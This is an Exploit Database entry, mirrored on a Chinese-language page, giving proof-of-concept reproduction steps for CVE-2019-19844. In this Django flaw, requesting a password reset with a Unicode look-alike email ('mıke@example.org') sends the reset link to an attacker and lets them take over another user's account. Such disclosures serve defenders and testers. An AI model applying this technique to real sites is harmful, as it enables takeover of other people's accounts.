Django < 3.0 < 2.2 < 1.11 - Account Hijack

• Exploit Database
• 133 阅读

• 作者： Ryuji Tsutsui
  日期： 2019-12-24
• 类别：

  • webapps
  平台：

  • Python
• 来源：https://www.exploit-db.com/exploits/47879/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30

  EDB Note ~ Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47879.zip     # django_cve_2019_19844_poc PoC for [CVE-2019-19844](https://www.djangoproject.com/weblog/2019/dec/18/security-releases/)   # Requirements   - Python 3.7.x - PostgreSQL 9.5 or higher   ## Setup   1. Create database(e.g. <code>django_cve_2019_19844_poc</code>) 1. Set the database name to the environment variable <code>DJANGO_DATABASE_NAME</code>(e.g. <code>export DJANGO_DATABASE_NAME=django_cve_2019_19844_poc</code>) 1. Run <code>pip install -r requirements.txt && ./manage.py migrate --noinput 1. Create the following user with <code>shell</code> command: </code><code>python >>> from django.contrib.auth import get_user_model >>> User = get_user_model() >>> User.objects.create_user(&apos;mike123&apos;, &apos;mike@example.org&apos;, &apos;test123&apos;) </code><code> ## Procedure For Reproducing   1. Run <code>./manage.py runserver 1. Open <code>http://127.0.0.1:8000/accounts/password-reset/ 1. Input <code>mıke@example.org</code> (Attacker&apos;s email), and click send button 1. Receive email (Check console), and reset password 1. Login as <code>mike123</code> user